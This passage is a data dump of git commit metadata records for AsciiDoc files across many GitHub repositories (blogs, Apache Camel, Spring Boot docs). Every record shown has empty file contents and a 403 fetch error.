2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa0540b04f1c3d7163cf07bd6cc6d89ba79aec89","subject":"added threading doc","message":"added threading doc","repos":"apaolini\/nagios-plugin-jbossas7,aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"threading.asciidoc","new_file":"threading.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"48a1c74b680359f583545ea16f243c18e404d27d","subject":"y2b create post i-CON 3DS Aluminum Case Unboxing \\u0026 Review","message":"y2b create post i-CON 3DS Aluminum Case Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-28-iCON-3DS-Aluminum-Case-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-03-28-iCON-3DS-Aluminum-Case-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d186c028a4d40c4fe9dcfc06a48e2b3d1351140","subject":"Added JSON Xstream Dataformat docs to Gitbook","message":"Added JSON Xstream Dataformat docs to Gitbook\n","repos":"hqstevenson\/camel,lburgazzoli\/apache-camel,yuruki\/camel,scranton\/camel,anton-k11\/camel,mgyongyosi\/camel,bhaveshdt\/camel,driseley\/camel,akhettar\/camel,veithen\/camel,anton-k11\/camel,isavin\/camel,ssharma\/camel,tdiesler\/camel,hqstevenson\/camel,bgaudaen\/camel,allancth\/camel,jkorab\/camel,snurmine\/camel,nboukhed\/camel,onders86\/camel,ssharma\/camel,lburgazzoli\/camel,nboukhed\/camel,sverkera\/camel,tdiesler\/camel,RohanHart\/camel,neoramon\/camel,bgaudaen\/camel,kevinearls\/camel,adessaigne\/camel,jarst\/camel,jamesnetherton\/camel,lburgazzoli\/camel,ullgren\/camel,jamesnetherton\/camel,bgaudaen\/camel,anoordover\/camel,w4tson\/camel,objectiser\/camel,sirlatrom\/camel,rmarting\/camel,tdiesler\/camel,neoramon\/camel,tkopczynski\/camel,CodeSmell\/camel,mcollovati\/camel,apache\/camel,sverkera\/camel,davidkarlsen\/camel,gautric\/camel,driseley\/camel,sabre1041\/camel,yuruki\/camel,prashant2402\/camel,rmarting\/camel,hqstevenson\/camel,pax95\/camel,nicolaferraro\/camel,objectiser\/camel,sverkera\/camel,Thopap\/camel,tlehoux\/camel,acartapanis\/camel,zregvart\/camel,nboukhed\/camel,ullgren\/camel,akhettar\/camel,pax95\/camel,ullgren\/camel,apache\/camel,RohanHart\/camel,gnodet\/camel,lburgazzoli\/camel,prashant2402\/camel,anoordover\/camel,allancth\/camel,bgaudaen\/camel,bhaveshdt\/camel,chirino\/camel,kevinearls\/camel,davidkarlsen\/camel,zregvart\/camel,neoramon\/camel,tlehoux\/camel,rmarting\/camel,adessaigne\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,allancth\/camel,prashant2402\/camel,gilfernandes\/camel,sabre1041\/camel,sirlatrom\/camel,gnodet\/camel,akhettar\/camel,bhaveshdt\/camel,jamesnetherton\/camel,sirlatrom\/camel,tkopczynski\/camel,sirlatrom\/camel,jkorab\/camel,curso007\/camel,acartapanis\/camel,pax95\/camel,allancth\/camel,dmvolod\/camel,dmvolod\/camel,apache\/camel,acartapanis\/camel,onders86\/camel,dmvolod\/camel,jarst\/camel,yuruki\/camel,tlehoux\/camel,curso007\/camel,veithen\/camel,w4tson\/camel,lburgazzoli\/apache-camel,CodeSmell\/camel,allancth\/camel,anoordover\/camel,jkorab\/camel,drsquidop\/camel,pkletsko\/camel,neoramon\/camel,scranton\/camel,alvinkwekel\/camel,sverkera\/camel,gilfernandes\/camel,pax95\/camel,apache\/camel,yuruki\/camel,Thopap\/camel,jonmcewen\/camel,onders86\/camel,cunningt\/camel,anoordover\/camel,apache\/camel,lburgazzoli\/apache-camel,NickCis\/camel,DariusX\/camel,hqstevenson\/camel,w4tson\/camel,DariusX\/camel,isavin\/camel,kevinearls\/camel,objectiser\/camel,chirino\/camel,yuruki\/camel,snurmine\/camel,pmoerenhout\/camel,sabre1041\/camel,christophd\/camel,kevinearls\/camel,Thopap\/camel,scranton\/camel,pmoerenhout\/camel,prashant2402\/camel,bgaudaen\/camel,objectiser\/camel,jarst\/camel,snurmine\/camel,nicolaferraro\/camel,isavin\/camel,allancth\/camel,tkopczynski\/camel,sverkera\/camel,lburgazzoli\/apache-camel,NickCis\/camel,Thopap\/camel,drsquidop\/camel,CodeSmell\/camel,scranton\/camel,sirlatrom\/camel,anton-k11\/camel,pkletsko\/camel,RohanHart\/camel,curso007\/camel,akhettar\/camel,akhettar\/camel,pmoerenhout\/camel,jkorab\/camel,nikhilvibhav\/camel,tkopczynski\/camel,tdiesler\/camel,tkopczynski\/camel,Thopap\/camel,isavin\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,drsquidop\/camel,driseley\/camel,jamesnetherton\/camel,JYBESSON\/camel,rmarting\/camel,tdiesler\/camel,tadayosi\/camel,alvinkwekel\/camel,anton-k11\/camel,pkletsko\/camel,mgyongyosi\/camel,jamesnetherton\/camel,sverkera\/camel,cunningt\/camel,Fabryprog\/camel,hqstevenson\/camel,jamesnetherton\/camel,pkletsko\/camel,salikjan\/camel,scranton\/camel,nicolaferraro\/camel,jarst\/camel,JYBESSON\/camel,w4tson\/camel,NickCis\/camel,nboukhed\/camel,onders86\/camel,gilfernandes\/camel,curso007\/camel,RohanHart\/camel,w4tson\/camel,pkletsko\/camel,NickCis\/camel,pax95\/camel,dmvolod\/camel,kevinearls\/camel,pmoerenhout\/camel,gautric\/camel,cunningt\/camel,nboukhed\/camel,drsquidop\/camel,Thopap\/camel,jonmcewen\/camel,RohanHart\/camel,gautric\/camel,anoordover\/camel,jonmcewen\/camel,gautric\/camel,anton-k11\/camel,gnodet\/camel,veithen\/camel,snurmine\/camel,lburgazzoli\/camel,adessaigne\/camel,lburgazzoli\/camel,christophd\/camel,JYBESSON\/camel,NickCis\/camel,christophd\/camel,jkorab\/camel,tadayosi\/camel,alvinkwekel\/camel,RohanHart\/camel,adessaigne\/camel,jkorab\/camel,salikjan\/camel,dmvolod\/camel,isavin\/camel,punkhorn\/camel-upstream,JYBESSON\/camel,sabre1041\/camel,tdiesler\/camel,Fabryprog\/camel,anton-k11\/camel,mgyongyosi\/camel,nikhilvibhav\/camel,gautric\/camel,pmoerenhout\/camel,chirino\/camel,jonmcewen\/camel,kevinearls\/camel,adessaigne\/camel,curso007\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,gilfernandes\/camel,tadayosi\/camel,ssharma\/camel,gautric\/camel,prashant2402\/camel,davidkarlsen\/camel,isavin\/camel,zregvart\/camel,drsquidop\/camel,pkletsko\/camel,driseley\/camel,jarst\/camel,nboukhed\/camel,veithen\/camel,chirino\/camel,punkhorn\/camel-upstream,tkopczynski\/camel,gnodet\/camel,CodeSmell\/camel,anoordover\/camel,adessaigne\/camel,yuruki\/camel,drsquidop\/camel,lburgazzoli\/camel,DariusX\/camel,neoramon\/camel,Fabryprog\/camel,bhaveshdt\/camel,rmarting\/camel,hqstevenson\/camel,sabre1041\/camel,sirlatrom\/camel,alvinkwekel\/camel,lburgazzoli\/apache-camel,jarst\/camel,NickCis\/camel,mgyongyosi\/camel,gnodet\/camel,bhaveshdt\/camel,mgyongyosi\/camel,veithen\/camel,christophd\/camel,JYBESSON\/camel,acartapanis\/camel,chirino\/camel,jonmcewen\/camel,JYBESSON\/camel,ssharma\/camel,jonmcewen\/camel,curso007\/camel,acartapanis\/camel,zregvart\/camel,gilfernandes\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,sabre1041\/camel,bhaveshdt\/camel,lburgazzoli\/apache-camel,mcollovati\/camel,tlehoux\/camel,ssharma\/camel,DariusX\/camel,onders86\/camel,tlehoux\/camel,driseley\/camel,punkhorn\/camel-upstream,ssharma\/camel,ullgren\/camel,pmoerenhout\/camel,christophd\/camel,neoramon\/camel,gilfernandes\/camel,mgyongyosi\/camel,Fabryprog\/camel,chirino\/camel,mcollovati\/camel,snurmine\/camel,tlehoux\/camel,driseley\/camel,prashant2402\/camel,tadayosi\/camel,apache\/camel,veithen\/camel,mcollovati\/camel,onders86\/camel,dmvolod\/camel,w4tson\/camel,nikhilvibhav\/camel,scranton\/camel,akhettar\/camel,christophd\/camel,acartapanis\/camel,bgaudaen\/camel,rmarting\/camel,snurmine\/camel","old_file":"components\/camel-xstream\/src\/main\/docs\/json-xstream-dataformat.adoc","new_file":"components\/camel-xstream\/src\/main\/docs\/json-xstream-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ae03b4da01f05f78ba96816fb4ea23f5e2f7f65","subject":"clean up","message":"clean up\n","repos":"lookout\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,cfieber\/clouddriver,cfieber\/clouddriver,spinnaker\/clouddriver,ajordens\/clouddriver,spinnaker\/clouddriver,duftler\/clouddriver,danveloper\/clouddriver,stitchfix\/clouddriver,stitchfix\/clouddriver,duftler\/clouddriver,duftler\/clouddriver,spinnaker\/clouddriver,cfieber\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,danveloper\/clouddriver,danveloper\/clouddriver,duftler\/clouddriver","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spinnaker\/clouddriver.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c73140b006d71cec1ffac4cfb2601a441262484e","subject":"add missing test fixture","message":"add missing test fixture\n","repos":"dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf","old_file":"spec\/fixtures\/reference-to-sibling.adoc","new_file":"spec\/fixtures\/reference-to-sibling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Hextremist\/asciidoctor-pdf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea65e964902b4392ed8e523fd3ea47599755b1ce","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"916f0cf58ef2b009edc42e6c76aecddc91b5b0ab","subject":"Update 2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","message":"Update 2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","new_file":"_posts\/2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b49978c199125ddbb4a6101f08ba7ea698cf405","subject":"Update 2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","message":"Update 2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","new_file":"_posts\/2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04580c8a83bb87a68775576177869980a3dfa8f0","subject":"some minor bugfixes for release plugin","message":"some minor bugfixes for release plugin\n","repos":"moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan","old_file":"leguan-server\/src\/main\/docs\/configureActions.adoc","new_file":"leguan-server\/src\/main\/docs\/configureActions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moley\/leguan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"24ce3ecb43f1668bebda374d45786ed38492d67d","subject":"Fix typo in docs","message":"Fix typo in docs\n","repos":"ptahchiev\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,bclozel\/spring-boot,drumonii\/spring-boot,vpavic\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,rweisleder\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,lburgazzoli\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,felipeg48\/spring-boot,bclozel\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,vpavic\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,ptahchiev\/spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,tsachev\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,zhanhb\/spring-boot,royclarkson\/spring-boot,yangdd1205\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,wilkinsona\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,shakuzen\/spring-boot,dreis2211\/spring-boot,Buzzardo\/spring-boot,lburgazzoli\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot,shakuzen\/spring-boot,drumonii\/spring-boot,chrylis\/spring-boot,lburgazzoli\/spring-boot,rweisleder\/spring-boot,eddumelendez\/spring-boot,jxblum\/spring-boot,ptahchiev\/spring-boot,rweisleder\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,drumonii\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,jxblum\/spring-boot,felipeg48\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,ilayaperumalg\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,michael-simons\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,felipeg48\/spring-boot,spring-projects\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,donhuvy\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,mbenson\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,bclozel\/spring-boot,yangdd1205\/spring-boot,wilkinsona\/spring-boot,tsachev\/spring-boot,htynkn\/spring-boot,NetoDevel\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,tsachev\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,vpavic\/spring-boot,philwebb\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9659837d0b64dff4f63012d440c7daa028dc0a30","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"010f80cd37dcc834228b420149e19eb811dcd4ce","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af810327af18b68eb00ea15ae661840b47508a3d","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"472bf968c20487ccda35f2ec26591fa8dab3ce50","subject":"Add note","message":"Add note\n","repos":"lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint","old_file":"doc-bridgepoint\/notes\/eclipse-2020-06\/eclipse-2020-06.int.adoc","new_file":"doc-bridgepoint\/notes\/eclipse-2020-06\/eclipse-2020-06.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b3b631d4bc766be6ab6b3f6ad5d6450e3a2c3ce6","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-common","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7634947476b14a22f412339d8144229999e4ace","subject":"Added a contribution document.","message":"Added a contribution document.\n\nThis document defines how contributions can be made to this project.\n","repos":"jsr377\/jsr377-api","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsr377\/jsr377-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e9c91f8c948eac80f8ae112e2024a8ecb1374a5","subject":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","message":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7390d3b9b68e111dbbbf08cf4fbb5060073732ba","subject":"Create README.adoc","message":"Create README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/olleh\/README.adoc","new_file":"example\/src\/olleh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a133f04067a2b8c4fa1ff5610119b5e44f0aa246","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dfd4465ffac5a61a6ba54d2acb5fd550547176d","subject":"Update 2017-06-26-vimmer1.adoc","message":"Update 2017-06-26-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-26-vimmer1.adoc","new_file":"_posts\/2017-06-26-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d9f54a4b21888b084cac944f5b806bfe3901cc8","subject":"Add blog post about new features in Undertow.js","message":"Add blog post about new features in Undertow.js\n","repos":"rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org","old_file":"news\/2015-11-02-Undertow.js-1.0.1.Final.adoc","new_file":"news\/2015-11-02-Undertow.js-1.0.1.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8386177bfd41586fdab6fb4b02644c299a791723","subject":"Clarify manual page even more","message":"Clarify manual page even more\n","repos":"lassik\/extract,lassik\/extract","old_file":"extract.1.adoc","new_file":"extract.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"b6a7ee076d38a7f552eaae75e18ee38f2b1a33cb","subject":"y2b create post These Tiny Earbuds Raised $2.7 Million Dollars...","message":"y2b create post These Tiny Earbuds Raised $2.7 Million Dollars...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-21-These-Tiny-Earbuds-Raised-27-Million-Dollars.adoc","new_file":"_posts\/2017-07-21-These-Tiny-Earbuds-Raised-27-Million-Dollars.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"714595cf1267e8eb1f36533b025fa8da94d8f18a","subject":"Create MacOSX.adoc","message":"Create MacOSX.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/installation\/MacOSX.adoc","new_file":"wiki\/installation\/MacOSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cc13b97c6158c62a5aad32fbc5d8586a0056882","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 